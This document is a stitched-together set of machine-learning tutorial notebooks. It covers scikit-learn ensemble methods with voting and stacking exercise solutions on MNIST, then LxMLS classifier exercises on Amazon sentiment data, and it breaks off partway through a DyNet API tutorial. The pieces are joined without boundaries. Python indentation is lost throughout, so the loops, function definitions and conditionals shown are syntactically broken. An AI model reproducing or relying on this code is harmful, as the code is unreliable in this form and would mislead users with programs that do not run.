save_fig("decision_tree_without_and_with_bagging_plot")
plt.show()
```
# Random Forests
```
bag_clf = BaggingClassifier(
DecisionTreeClassifier(splitter="random", max_leaf_nodes=16, random_state=42),
n_estimators=500, max_samples=1.0, bootstrap=True, random_state=42)
bag_clf.fit(X_train, y_train)
y_pred = bag_clf.predict(X_test)
from sklearn.ensemble import RandomForestClassifier
rnd_clf = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, random_state=42)
rnd_clf.fit(X_train, y_train)
y_pred_rf = rnd_clf.predict(X_test)
np.sum(y_pred == y_pred_rf) / len(y_pred) # almost identical predictions
from sklearn.datasets import load_iris
iris = load_iris()
rnd_clf = RandomForestClassifier(n_estimators=500, random_state=42)
rnd_clf.fit(iris["data"], iris["target"])
for name, score in zip(iris["feature_names"], rnd_clf.feature_importances_):
print(name, score)
rnd_clf.feature_importances_
plt.figure(figsize=(6, 4))
for i in range(15):
tree_clf = DecisionTreeClassifier(max_leaf_nodes=16, random_state=42 + i)
indices_with_replacement = np.random.randint(0, len(X_train), len(X_train))
tree_clf.fit(X[indices_with_replacement], y[indices_with_replacement])
plot_decision_boundary(tree_clf, X, y, axes=[-1.5, 2.45, -1, 1.5], alpha=0.02, contour=False)
plt.show()
```
## Out-of-Bag evaluation
```
bag_clf = BaggingClassifier(
DecisionTreeClassifier(random_state=42), n_estimators=500,
bootstrap=True, oob_score=True, random_state=40)
bag_clf.fit(X_train, y_train)
bag_clf.oob_score_
bag_clf.oob_decision_function_
from sklearn.metrics import accuracy_score
y_pred = bag_clf.predict(X_test)
accuracy_score(y_test, y_pred)
```
## Feature importance
```
from sklearn.datasets import fetch_openml
mnist = fetch_openml('mnist_784', version=1)
mnist.target = mnist.target.astype(np.uint8)
rnd_clf = RandomForestClassifier(n_estimators=100, random_state=42)
rnd_clf.fit(mnist["data"], mnist["target"])
def plot_digit(data):
image = data.reshape(28, 28)
plt.imshow(image, cmap = mpl.cm.hot,
interpolation="nearest")
plt.axis("off")
plot_digit(rnd_clf.feature_importances_)
cbar = plt.colorbar(ticks=[rnd_clf.feature_importances_.min(), rnd_clf.feature_importances_.max()])
cbar.ax.set_yticklabels(['Not important', 'Very important'])
save_fig("mnist_feature_importance_plot")
plt.show()
```
# AdaBoost
```
from sklearn.ensemble import AdaBoostClassifier
ada_clf = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=1), n_estimators=200,
algorithm="SAMME.R", learning_rate=0.5, random_state=42)
ada_clf.fit(X_train, y_train)
plot_decision_boundary(ada_clf, X, y)
m = len(X_train)
fig, axes = plt.subplots(ncols=2, figsize=(10,4), sharey=True)
for subplot, learning_rate in ((0, 1), (1, 0.5)):
sample_weights = np.ones(m)
plt.sca(axes[subplot])
for i in range(5):
svm_clf = SVC(kernel="rbf", C=0.05, gamma="scale", random_state=42)
svm_clf.fit(X_train, y_train, sample_weight=sample_weights)
y_pred = svm_clf.predict(X_train)
sample_weights[y_pred != y_train] *= (1 + learning_rate)
plot_decision_boundary(svm_clf, X, y, alpha=0.2)
plt.title("learning_rate = {}".format(learning_rate), fontsize=16)
if subplot == 0:
plt.text(-0.7, -0.65, "1", fontsize=14)
plt.text(-0.6, -0.10, "2", fontsize=14)
plt.text(-0.5, 0.10, "3", fontsize=14)
plt.text(-0.4, 0.55, "4", fontsize=14)
plt.text(-0.3, 0.90, "5", fontsize=14)
else:
plt.ylabel("")
save_fig("boosting_plot")
plt.show()
list(m for m in dir(ada_clf) if not m.startswith("_") and m.endswith("_"))
```
# Gradient Boosting
```
np.random.seed(42)
X = np.random.rand(100, 1) - 0.5
y = 3*X[:, 0]**2 + 0.05 * np.random.randn(100)
from sklearn.tree import DecisionTreeRegressor
tree_reg1 = DecisionTreeRegressor(max_depth=2, random_state=42)
tree_reg1.fit(X, y)
y2 = y - tree_reg1.predict(X)
tree_reg2 = DecisionTreeRegressor(max_depth=2, random_state=42)
tree_reg2.fit(X, y2)
y3 = y2 - tree_reg2.predict(X)
tree_reg3 = DecisionTreeRegressor(max_depth=2, random_state=42)
tree_reg3.fit(X, y3)
X_new = np.array([[0.8]])
y_pred = sum(tree.predict(X_new) for tree in (tree_reg1, tree_reg2, tree_reg3))
y_pred
def plot_predictions(regressors, X, y, axes, label=None, style="r-", data_style="b.", data_label=None):
x1 = np.linspace(axes[0], axes[1], 500)
y_pred = sum(regressor.predict(x1.reshape(-1, 1)) for regressor in regressors)
plt.plot(X[:, 0], y, data_style, label=data_label)
plt.plot(x1, y_pred, style, linewidth=2, label=label)
if label or data_label:
plt.legend(loc="upper center", fontsize=16)
plt.axis(axes)
plt.figure(figsize=(11,11))
plt.subplot(321)
plot_predictions([tree_reg1], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h_1(x_1)$", style="g-", data_label="Training set")
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.title("Residuals and tree predictions", fontsize=16)
plt.subplot(322)
plot_predictions([tree_reg1], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h(x_1) = h_1(x_1)$", data_label="Training set")
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.title("Ensemble predictions", fontsize=16)
plt.subplot(323)
plot_predictions([tree_reg2], X, y2, axes=[-0.5, 0.5, -0.5, 0.5], label="$h_2(x_1)$", style="g-", data_style="k+", data_label="Residuals")
plt.ylabel("$y - h_1(x_1)$", fontsize=16)
plt.subplot(324)
plot_predictions([tree_reg1, tree_reg2], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h(x_1) = h_1(x_1) + h_2(x_1)$")
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.subplot(325)
plot_predictions([tree_reg3], X, y3, axes=[-0.5, 0.5, -0.5, 0.5], label="$h_3(x_1)$", style="g-", data_style="k+")
plt.ylabel("$y - h_1(x_1) - h_2(x_1)$", fontsize=16)
plt.xlabel("$x_1$", fontsize=16)
plt.subplot(326)
plot_predictions([tree_reg1, tree_reg2, tree_reg3], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h(x_1) = h_1(x_1) + h_2(x_1) + h_3(x_1)$")
plt.xlabel("$x_1$", fontsize=16)
plt.ylabel("$y$", fontsize=16, rotation=0)
save_fig("gradient_boosting_plot")
plt.show()
from sklearn.ensemble import GradientBoostingRegressor
gbrt = GradientBoostingRegressor(max_depth=2, n_estimators=3, learning_rate=1.0, random_state=42)
gbrt.fit(X, y)
gbrt_slow = GradientBoostingRegressor(max_depth=2, n_estimators=200, learning_rate=0.1, random_state=42)
gbrt_slow.fit(X, y)
fig, axes = plt.subplots(ncols=2, figsize=(10,4), sharey=True)
plt.sca(axes[0])
plot_predictions([gbrt], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="Ensemble predictions")
plt.title("learning_rate={}, n_estimators={}".format(gbrt.learning_rate, gbrt.n_estimators), fontsize=14)
plt.xlabel("$x_1$", fontsize=16)
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.sca(axes[1])
plot_predictions([gbrt_slow], X, y, axes=[-0.5, 0.5, -0.1, 0.8])
plt.title("learning_rate={}, n_estimators={}".format(gbrt_slow.learning_rate, gbrt_slow.n_estimators), fontsize=14)
plt.xlabel("$x_1$", fontsize=16)
save_fig("gbrt_learning_rate_plot")
plt.show()
```
## Gradient Boosting with Early stopping
```
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
X_train, X_val, y_train, y_val = train_test_split(X, y, random_state=49)
gbrt = GradientBoostingRegressor(max_depth=2, n_estimators=120, random_state=42)
gbrt.fit(X_train, y_train)
errors = [mean_squared_error(y_val, y_pred)
for y_pred in gbrt.staged_predict(X_val)]
bst_n_estimators = np.argmin(errors) + 1
gbrt_best = GradientBoostingRegressor(max_depth=2, n_estimators=bst_n_estimators, random_state=42)
gbrt_best.fit(X_train, y_train)
min_error = np.min(errors)
plt.figure(figsize=(10, 4))
plt.subplot(121)
plt.plot(errors, "b.-")
plt.plot([bst_n_estimators, bst_n_estimators], [0, min_error], "k--")
plt.plot([0, 120], [min_error, min_error], "k--")
plt.plot(bst_n_estimators, min_error, "ko")
plt.text(bst_n_estimators, min_error*1.2, "Minimum", ha="center", fontsize=14)
plt.axis([0, 120, 0, 0.01])
plt.xlabel("Number of trees")
plt.ylabel("Error", fontsize=16)
plt.title("Validation error", fontsize=14)
plt.subplot(122)
plot_predictions([gbrt_best], X, y, axes=[-0.5, 0.5, -0.1, 0.8])
plt.title("Best model (%d trees)" % bst_n_estimators, fontsize=14)
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.xlabel("$x_1$", fontsize=16)
save_fig("early_stopping_gbrt_plot")
plt.show()
gbrt = GradientBoostingRegressor(max_depth=2, warm_start=True, random_state=42)
min_val_error = float("inf")
error_going_up = 0
for n_estimators in range(1, 120):
gbrt.n_estimators = n_estimators
gbrt.fit(X_train, y_train)
y_pred = gbrt.predict(X_val)
val_error = mean_squared_error(y_val, y_pred)
if val_error < min_val_error:
min_val_error = val_error
error_going_up = 0
else:
error_going_up += 1
if error_going_up == 5:
break # early stopping
print(gbrt.n_estimators)
print("Minimum validation MSE:", min_val_error)
```
## Using XGBoost
```
try:
import xgboost
except ImportError as ex:
print("Error: the xgboost library is not installed.")
xgboost = None
if xgboost is not None: # not shown in the book
xgb_reg = xgboost.XGBRegressor(random_state=42)
xgb_reg.fit(X_train, y_train)
y_pred = xgb_reg.predict(X_val)
val_error = mean_squared_error(y_val, y_pred) # Not shown
print("Validation MSE:", val_error) # Not shown
if xgboost is not None: # not shown in the book
xgb_reg.fit(X_train, y_train,
eval_set=[(X_val, y_val)], early_stopping_rounds=2)
y_pred = xgb_reg.predict(X_val)
val_error = mean_squared_error(y_val, y_pred) # Not shown
print("Validation MSE:", val_error) # Not shown
%timeit xgboost.XGBRegressor().fit(X_train, y_train) if xgboost is not None else None
%timeit GradientBoostingRegressor().fit(X_train, y_train)
```
# Exercise solutions
## 1. to 7.
See Appendix A.
## 8. Voting Classifier
Exercise: _Load the MNIST data and split it into a training set, a validation set, and a test set (e.g., use 50,000 instances for training, 10,000 for validation, and 10,000 for testing)._
The MNIST dataset was loaded earlier.
```
from sklearn.model_selection import train_test_split
X_train_val, X_test, y_train_val, y_test = train_test_split(
mnist.data, mnist.target, test_size=10000, random_state=42)
X_train, X_val, y_train, y_val = train_test_split(
X_train_val, y_train_val, test_size=10000, random_state=42)
```
Exercise: _Then train various classifiers, such as a Random Forest classifier, an Extra-Trees classifier, and an SVM._
```
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.svm import LinearSVC
from sklearn.neural_network import MLPClassifier
random_forest_clf = RandomForestClassifier(n_estimators=100, random_state=42)
extra_trees_clf = ExtraTreesClassifier(n_estimators=100, random_state=42)
svm_clf = LinearSVC(random_state=42)
mlp_clf = MLPClassifier(random_state=42)
estimators = [random_forest_clf, extra_trees_clf, svm_clf, mlp_clf]
for estimator in estimators:
print("Training the", estimator)
estimator.fit(X_train, y_train)
[estimator.score(X_val, y_val) for estimator in estimators]
```
The linear SVM is far outperformed by the other classifiers. However, let's keep it for now since it may improve the voting classifier's performance.
Exercise: _Next, try to combine them into an ensemble that outperforms them all on the validation set, using a soft or hard voting classifier._
```
from sklearn.ensemble import VotingClassifier
named_estimators = [
("random_forest_clf", random_forest_clf),
("extra_trees_clf", extra_trees_clf),
("svm_clf", svm_clf),
("mlp_clf", mlp_clf),
]
voting_clf = VotingClassifier(named_estimators)
voting_clf.fit(X_train, y_train)
voting_clf.score(X_val, y_val)
[estimator.score(X_val, y_val) for estimator in voting_clf.estimators_]
```
Let's remove the SVM to see if performance improves. It is possible to remove an estimator by setting it to `None` using `set_params()` like this:
```
voting_clf.set_params(svm_clf=None)
```
This updated the list of estimators:
```
voting_clf.estimators
```
However, it did not update the list of _trained_ estimators:
```
voting_clf.estimators_
```
So we can either fit the `VotingClassifier` again, or just remove the SVM from the list of trained estimators:
```
del voting_clf.estimators_[2]
```
Now let's evaluate the `VotingClassifier` again:
```
voting_clf.score(X_val, y_val)
```
A bit better! The SVM was hurting performance. Now let's try using a soft voting classifier. We do not actually need to retrain the classifier, we can just set `voting` to `"soft"`:
```
voting_clf.voting = "soft"
voting_clf.score(X_val, y_val)
```
Nope, hard voting wins in this case.
_Once you have found one, try it on the test set. How much better does it perform compared to the individual classifiers?_
```
voting_clf.voting = "hard"
voting_clf.score(X_test, y_test)
[estimator.score(X_test, y_test) for estimator in voting_clf.estimators_]
```
The voting classifier only very slightly reduced the error rate of the best model in this case.
## 9. Stacking Ensemble
Exercise: _Run the individual classifiers from the previous exercise to make predictions on the validation set, and create a new training set with the resulting predictions: each training instance is a vector containing the set of predictions from all your classifiers for an image, and the target is the image's class. Train a classifier on this new training set._
```
X_val_predictions = np.empty((len(X_val), len(estimators)), dtype=np.float32)
for index, estimator in enumerate(estimators):
X_val_predictions[:, index] = estimator.predict(X_val)
X_val_predictions
rnd_forest_blender = RandomForestClassifier(n_estimators=200, oob_score=True, random_state=42)
rnd_forest_blender.fit(X_val_predictions, y_val)
rnd_forest_blender.oob_score_
```
You could fine-tune this blender or try other types of blenders (e.g., an `MLPClassifier`), then select the best one using cross-validation, as always.
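That blender-selection step can be sketched with cross-validation. To keep the sketch self-contained it fabricates a small synthetic prediction matrix instead of reusing `X_val_predictions`; the variable names, the 90% accuracy of the simulated classifiers, and the candidate list are illustrative assumptions only.

```
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import cross_val_score

# Synthetic stand-in for X_val_predictions: three classifiers that each
# guess the true class 90% of the time (labels 0-9, 500 "images")
rng = np.random.RandomState(42)
y_blend = rng.randint(0, 10, size=500)
X_blend = np.stack(
    [np.where(rng.rand(500) < 0.9, y_blend, rng.randint(0, 10, 500))
     for _ in range(3)], axis=1).astype(np.float32)

# Compare candidate blenders with 3-fold cross-validation
blenders = {
    "random_forest": RandomForestClassifier(n_estimators=100, random_state=42),
    "mlp": MLPClassifier(random_state=42, max_iter=1000),
}
cv_means = {name: cross_val_score(clf, X_blend, y_blend, cv=3).mean()
            for name, clf in blenders.items()}
print(cv_means)
```

You would then refit the winning blender on the full validation-set predictions before evaluating on the test set.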
Exercise: _Congratulations, you have just trained a blender, and together with the classifiers they form a stacking ensemble! Now let's evaluate the ensemble on the test set. For each image in the test set, make predictions with all your classifiers, then feed the predictions to the blender to get the ensemble's predictions. How does it compare to the voting classifier you trained earlier?_
```
X_test_predictions = np.empty((len(X_test), len(estimators)), dtype=np.float32)
for index, estimator in enumerate(estimators):
    X_test_predictions[:, index] = estimator.predict(X_test)
y_pred = rnd_forest_blender.predict(X_test_predictions)
from sklearn.metrics import accuracy_score
accuracy_score(y_test, y_pred)
```
This stacking ensemble does not perform as well as the voting classifier we trained earlier; it's not quite as good as the best individual classifier.
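As an aside, scikit-learn also packages this pattern as `StackingClassifier`, which builds the blender's training set from out-of-fold predictions automatically. A small sketch on synthetic data (not the dataset used above):

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier, StackingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier

X, y = make_classification(n_samples=500, random_state=42)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)

stack = StackingClassifier(
    estimators=[("rf", RandomForestClassifier(n_estimators=50, random_state=42)),
                ("tree", DecisionTreeClassifier(random_state=42))],
    final_estimator=LogisticRegression(),  # the blender
    cv=5,  # the blender is trained on out-of-fold predictions
)
stack.fit(X_train, y_train)
test_acc = stack.score(X_test, y_test)
print(test_acc)
```

This avoids the manual fold bookkeeping we did above, at the cost of refitting each base estimator once per fold.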
## Exercise 1.1
In this exercise we will use the Amazon sentiment analysis data (Blitzer et al., 2007), where the goal is to classify text documents as expressing a positive or negative sentiment (i.e., a classification problem with two classes). We are going to focus on book reviews. To load the data, type:
```
import lxmls.readers.sentiment_reader as srs
scr = srs.SentimentCorpus("books")
import lxmls.classifiers.multinomial_naive_bayes as mnbb
mnb = mnbb.MultinomialNaiveBayes()
params_nb_sc = mnb.train(scr.train_X,scr.train_y)
y_pred_train = mnb.test(scr.train_X,params_nb_sc)
acc_train = mnb.evaluate(scr.train_y, y_pred_train)
y_pred_test = mnb.test(scr.test_X,params_nb_sc)
acc_test = mnb.evaluate(scr.test_y, y_pred_test)
print("Multinomial Naive Bayes Amazon Sentiment Accuracy train: %f test: %f"%(acc_train,acc_test))
```
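For intuition about what `train` estimates, here is a minimal numpy sketch of multinomial Naive Bayes with add-alpha smoothing. It is our own illustration; the lxmls `MultinomialNaiveBayes` may differ in details such as smoothing:

```python
import numpy as np

def mnb_train(X, y, alpha=1.0):
    """Multinomial Naive Bayes with add-alpha smoothing (illustrative sketch)."""
    classes = np.unique(y)
    log_prior = np.log(np.array([(y == c).mean() for c in classes]))
    counts = np.array([X[y == c].sum(axis=0) for c in classes], dtype=float)
    # smoothed per-class word log-probabilities
    log_lik = np.log((counts + alpha) /
                     (counts.sum(axis=1, keepdims=True) + alpha * X.shape[1]))
    return classes, log_prior, log_lik

def mnb_predict(X, classes, log_prior, log_lik):
    # pick the class maximizing log P(c) + sum_w count(w) log P(w|c)
    return classes[np.argmax(X @ log_lik.T + log_prior, axis=1)]

# tiny document-term matrix: two "positive" and two "negative" reviews
X = np.array([[3, 0], [2, 1], [0, 3], [1, 2]], dtype=float)
y = np.array([1, 1, 0, 0])
params = mnb_train(X, y)
preds = mnb_predict(X, *params)
print(preds)
```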
## Exercise 1.2
We provide an implementation of the perceptron algorithm in the class `Perceptron` (file `perceptron.py`).
```
# 1. Run the following commands to generate a simple dataset
import lxmls.readers.simple_data_set as sds
sd = sds.SimpleDataSet(nr_examples=100, g1 = [[-1,-1],1], g2 = [[1,1],1], balance=0.5, split=[0.5,0,0.5])
# 2. Run the perceptron algorithm on the simple dataset previously generated and report its train and test set accuracy:
import lxmls.classifiers.perceptron as percc
perc = percc.Perceptron()
params_perc_sd = perc.train(sd.train_X,sd.train_y)
y_pred_train = perc.test(sd.train_X,params_perc_sd)
acc_train = perc.evaluate(sd.train_y, y_pred_train)
y_pred_test = perc.test(sd.test_X,params_perc_sd)
acc_test = perc.evaluate(sd.test_y, y_pred_test)
print("Perceptron Simple Dataset Accuracy train: %f test: %f"%(acc_train, acc_test))
# 3. Plot the decision boundary found:
fig,axis = sd.plot_data()
fig,axis = sd.add_line(fig,axis,params_perc_sd,"Perceptron","blue")
# 4. Run the perceptron algorithm on the Amazon dataset.
import lxmls.classifiers.perceptron as percc
perc = percc.Perceptron()
params_perc_sc = perc.train(scr.train_X,scr.train_y)
y_pred_train = perc.test(scr.train_X,params_perc_sc)
acc_train = perc.evaluate(scr.train_y, y_pred_train)
y_pred_test = perc.test(scr.test_X,params_perc_sc)
acc_test = perc.evaluate(scr.test_y, y_pred_test)
print("Perceptron Amazon Sentiment Accuracy train: %f test: %f"%(acc_train,acc_test))
```
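The core of the algorithm is a mistake-driven update. A minimal numpy sketch, written by us with labels in {0, 1}; the lxmls class applies a rule of this form with its own data conventions:

```python
import numpy as np

def perceptron_train(X, y, epochs=10):
    """Mistake-driven perceptron for labels in {0, 1} (illustrative sketch)."""
    w = np.zeros(X.shape[1])
    b = 0.0
    for _ in range(epochs):
        for xi, yi in zip(X, y):
            pred = 1 if xi @ w + b >= 0 else 0
            if pred != yi:            # update weights only on mistakes
                w += (yi - pred) * xi
                b += (yi - pred)
    return w, b

# linearly separable toy data
X = np.array([[-1.0, -1.0], [-2.0, -1.0], [1.0, 1.0], [2.0, 1.0]])
y = np.array([0, 0, 1, 1])
w, b = perceptron_train(X, y)
preds = (X @ w + b >= 0).astype(int)
print(preds)
```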
## Exercise 1.3
We provide an implementation of the MIRA algorithm. Compare it with the perceptron for various values of the regularizer λ:
```
import lxmls.classifiers.mira as mirac
mira = mirac.Mira()
mira.regularizer = 1.0 # This is lambda
params_mira_sd = mira.train(sd.train_X,sd.train_y)
y_pred_train = mira.test(sd.train_X,params_mira_sd)
acc_train = mira.evaluate(sd.train_y, y_pred_train)
y_pred_test = mira.test(sd.test_X,params_mira_sd)
acc_test = mira.evaluate(sd.test_y, y_pred_test)
print("Mira Simple Dataset Accuracy train: %f test: %f"%(acc_train, acc_test))
fig, axis = sd.add_line(fig, axis, params_mira_sd, "Mira","green")
fig
import lxmls.classifiers.mira as mirac
mira = mirac.Mira()
mira.regularizer = 1.0 # This is lambda
params_mira_sc = mira.train(scr.train_X,scr.train_y)
y_pred_train = mira.test(scr.train_X,params_mira_sc)
acc_train = mira.evaluate(scr.train_y, y_pred_train)
y_pred_test = mira.test(scr.test_X,params_mira_sc)
acc_test = mira.evaluate(scr.test_y, y_pred_test)
print("Mira Amazon Sentiment Accuracy train: %f test: %f"%(acc_train,acc_test))
```
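For reference, the classic MIRA update solves a per-example margin constraint in closed form, with the step size clipped by an aggressiveness constant. A hedged numpy sketch of our own; the lxmls `Mira` class and the meaning of its `regularizer` attribute may differ in details:

```python
import numpy as np

def mira_train(X, y, C=1.0, epochs=5):
    """MIRA-style updates for labels in {-1, +1} (illustrative sketch)."""
    w = np.zeros(X.shape[1])
    for _ in range(epochs):
        for xi, yi in zip(X, y):
            loss = max(0.0, 1.0 - yi * (xi @ w))   # hinge loss on this example
            if loss > 0:
                tau = min(C, loss / (xi @ xi))     # closed-form step, clipped at C
                w += tau * yi * xi
    return w

# linearly separable toy data
X = np.array([[-1.0, -1.0], [-2.0, -1.0], [1.0, 1.0], [2.0, 1.0]])
y = np.array([-1, -1, 1, 1])
w = mira_train(X, y)
signs = np.sign(X @ w)
print(signs)
```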
## Exercise 1.4
We provide an implementation of the L-BFGS algorithm for training maximum entropy models in the class `MaxEntBatch`, as well as an implementation of the SGD algorithm in the class `MaxEntOnline`.
```
# 1. Train a maximum entropy model using L-BFGS on the simple dataset (try different values of λ).
#    Compare the results with the previous methods.
#    Plot the decision boundary.
import lxmls.classifiers.max_ent_batch as mebc
me_lbfgs = mebc.MaxEntBatch()
me_lbfgs.regularizer = 1.0
params_meb_sd = me_lbfgs.train(sd.train_X,sd.train_y)
y_pred_train = me_lbfgs.test(sd.train_X,params_meb_sd)
acc_train = me_lbfgs.evaluate(sd.train_y, y_pred_train)
y_pred_test = me_lbfgs.test(sd.test_X,params_meb_sd)
acc_test = me_lbfgs.evaluate(sd.test_y, y_pred_test)
print(
"Max-Ent batch Simple Dataset Accuracy train: %f test: %f" %
(acc_train,acc_test)
)
fig, axis = sd.add_line(fig, axis, params_meb_sd, "Max-Ent-Batch","orange")
fig
# 2. Train a maximum entropy model using L-BFGS on the Amazon dataset (try different values of λ)
#    and report training and test set accuracy. What do you observe?
params_meb_sc = me_lbfgs.train(scr.train_X,scr.train_y)
y_pred_train = me_lbfgs.test(scr.train_X,params_meb_sc)
acc_train = me_lbfgs.evaluate(scr.train_y, y_pred_train)
y_pred_test = me_lbfgs.test(scr.test_X,params_meb_sc)
acc_test = me_lbfgs.evaluate(scr.test_y, y_pred_test)
print(
"Max-Ent Batch Amazon Sentiment Accuracy train: %f test: %f" %
(acc_train, acc_test)
)
# 3. Now fix λ = 1.0 and train with SGD (you might try to adjust the initial step).
#    Compare the objective values obtained during training with those obtained with L-BFGS.
#    What do you observe?
import lxmls.classifiers.max_ent_online as meoc
me_sgd = meoc.MaxEntOnline()
me_sgd.regularizer = 1.0
params_meo_sc = me_sgd.train(scr.train_X,scr.train_y)
y_pred_train = me_sgd.test(scr.train_X,params_meo_sc)
acc_train = me_sgd.evaluate(scr.train_y, y_pred_train)
y_pred_test = me_sgd.test(scr.test_X,params_meo_sc)
acc_test = me_sgd.evaluate(scr.test_y, y_pred_test)
print(
"Max-Ent Online Amazon Sentiment Accuracy train: %f test: %f" %
(acc_train, acc_test)
)
```
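In the binary case, the maximum entropy model reduces to logistic regression, and each SGD step has a simple closed form. A hedged numpy sketch of our own; `MaxEntOnline`'s step-size schedule and regularization details may differ:

```python
import numpy as np

def maxent_sgd(X, y, lam=0.01, lr=0.1, epochs=100):
    """SGD for binary logistic regression (two-class maximum entropy).
    Each step follows the gradient of the per-example log-loss plus an L2 term.
    Illustrative sketch only."""
    n, d = X.shape
    w = np.zeros(d)
    for _ in range(epochs):
        for xi, yi in zip(X, y):
            p = 1.0 / (1.0 + np.exp(-(xi @ w)))     # P(y = 1 | x)
            w -= lr * ((p - yi) * xi + lam * w / n)  # gradient step
    return w

X = np.array([[-2.0], [-1.0], [1.0], [2.0]])
y = np.array([0, 0, 1, 1])
w = maxent_sgd(X, y)
print(w)  # positive weight: larger x means higher P(y = 1)
```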
## Exercise 1.5
Run the SVM primal algorithm. Then, repeat the MaxEnt exercise now using SVMs, for several values of λ:
```
import lxmls.classifiers.svm as svmc
svm = svmc.SVM()
svm.regularizer = 1.0 # This is lambda
params_svm_sd = svm.train(sd.train_X,sd.train_y)
y_pred_train = svm.test(sd.train_X,params_svm_sd)
acc_train = svm.evaluate(sd.train_y, y_pred_train)
y_pred_test = svm.test(sd.test_X,params_svm_sd)
acc_test = svm.evaluate(sd.test_y, y_pred_test)
print("SVM Online Simple Dataset Accuracy train: {} test: {}".format(acc_train,acc_test))
fig, axis = sd.add_line(fig, axis, params_svm_sd, "SVM", "yellow")
fig
params_svm_sc = svm.train(scr.train_X,scr.train_y)
y_pred_train = svm.test(scr.train_X,params_svm_sc)
acc_train = svm.evaluate(scr.train_y, y_pred_train)
y_pred_test = svm.test(scr.test_X,params_svm_sc)
acc_test = svm.evaluate(scr.test_y, y_pred_test)
print("SVM Online Amazon Sentiment Accuracy train: {} test: {}".format(acc_train,acc_test))
```
## Exercise 1.6
Using the simple dataset, run the different algorithms while varying some characteristics of the data, such as the number of points, the variance (and hence separability), and the class balance. Use the function `run_all_classifiers` in the file `lxmls/run_all_classifiers.py`, which receives a dataset and plots all decision boundaries and accuracies. What can you say about the methods when the amount of data increases? What about when the classes become too unbalanced?
```
from lxmls.run_all_classifiers import run_all_classifiers
run_all_classifiers(sd)
```
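If you want to run the same kind of study with off-the-shelf models instead of the lxmls classifiers, a scikit-learn sketch along these lines may help (all names here are ours, not part of the lab code):

```python
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression, Perceptron
from sklearn.model_selection import train_test_split

def compare(n_samples, weights):
    # generate a 2-D dataset with a given size and class balance
    X, y = make_classification(n_samples=n_samples, n_features=2,
                               n_informative=2, n_redundant=0,
                               weights=weights, random_state=0)
    X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0, stratify=y)
    return {name: clf.fit(X_tr, y_tr).score(X_te, y_te)
            for name, clf in [("perceptron", Perceptron()),
                              ("logreg", LogisticRegression())]}

for n in (50, 500):
    for w in ([0.5, 0.5], [0.9, 0.1]):
        scores = compare(n, w)
        print(n, w, scores)
```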
## API tutorial
### Expression building
(note: may have old API in some cases)
```
import dynet as dy
## ==== Create a new computation graph
# (it is a singleton, we have one at each stage.
# dy.renew_cg() clears the current one and starts anew)
dy.renew_cg()
## ==== Creating Expressions from user input / constants.
x = dy.scalarInput(value)
v = dy.vecInput(dimension)
v.set([1,2,3])
z = dy.matInput(dim1, dim2)
# for example:
z1 = dy.matInput(2, 2)
z1.set([1,2,3,4]) # Column major
# Or directly from a numpy array
z1 = dy.inputTensor([[1,2],[3,4]]) # Row major
## ==== We can take the value of an expression.
# For complex expressions, this will run forward propagation.
print(z.value())
print(z.npvalue())      # as numpy array
print(v.vec_value())    # as vector, if vector
print(x.scalar_value()) # as scalar, if scalar
print(x.value())        # choose the correct one
## ==== Parameters
# Parameters are things we tune during training.
# Usually a matrix or a vector.
# First we create a parameter collection and add the parameters to it.
m = dy.ParameterCollection()
pW = m.add_parameters((8,8)) # an 8x8 matrix
pb = m.add_parameters(8)
# then we create an Expression out of the parameter collection's parameters
W = dy.parameter(pW)
b = dy.parameter(pb)
## ===== Lookup parameters
# Similar to parameters, but are representing a "lookup table"
# that maps numbers to vectors.
# These are used for embedding matrices.
# for example, this will have VOCAB_SIZE rows, each of DIM dimensions.
lp = m.add_lookup_parameters((VOCAB_SIZE, DIM))
# lookup parameters can be initialized from an existing array, i.e:
# m["lookup"].init_from_array(wv)
e5 = dy.lookup(lp, 5) # create an Expression from row 5.
e5 = lp[5] # same
e5c = dy.lookup(lp, 5, update=False) # as before, but don't update when optimizing.
e5 = dy.lookup_batch(lp, [4, 5]) # create a batched Expression from rows 4 and 5.
e5 = lp.batch([4, 5]) # same
e5.set(9) # now the e5 expression contains row 9
e5c.set(9) # ditto
## ===== Combine expression into complex expressions.
# Math
e = e1 + e2
e = e1 * e2 # for vectors/matrices: matrix multiplication (like e1.dot(e2) in numpy)
e = e1 - e2
e = -e1
e = dy.dot_product(e1, e2)
e = dy.cmult(e1, e2) # component-wise multiply (like e1*e2 in numpy)
e = dy.cdiv(e1, e2) # component-wise divide
e = dy.colwise_add(e1, e2) # column-wise addition
# Matrix Shapes
e = dy.reshape(e1, new_dimension)
e = dy.transpose(e1)
# Per-element unary functions.
e = dy.tanh(e1)
e = dy.exp(e1)
e = dy.log(e1)
e = dy.logistic(e1) # Sigmoid(x)
e = dy.rectify(e1) # Relu (= max(x,0))
e = dy.softsign(e1) # x/(1+|x|)
# softmaxes
e = dy.softmax(e1)
e = dy.log_softmax(e1, restrict=[]) # restrict is a set of indices.
# if not empty, only entries in restrict are part
# of softmax computation, others get 0.
e = dy.sum_cols(e1)
# Picking values from vector expressions
e = dy.pick(e1, k) # k is unsigned integer, e1 is vector. return e1[k]
e = e1[k] # same
e = dy.pickrange(e1, k, v) # like python's e1[k:v] for lists. e1 is an Expression, k,v integers.
e = e1[k:v] # same
e = dy.pickneglogsoftmax(e1, k) # k is unsigned integer. equiv to: (pick(-log(dy.softmax(e1)), k))
# Neural net stuff
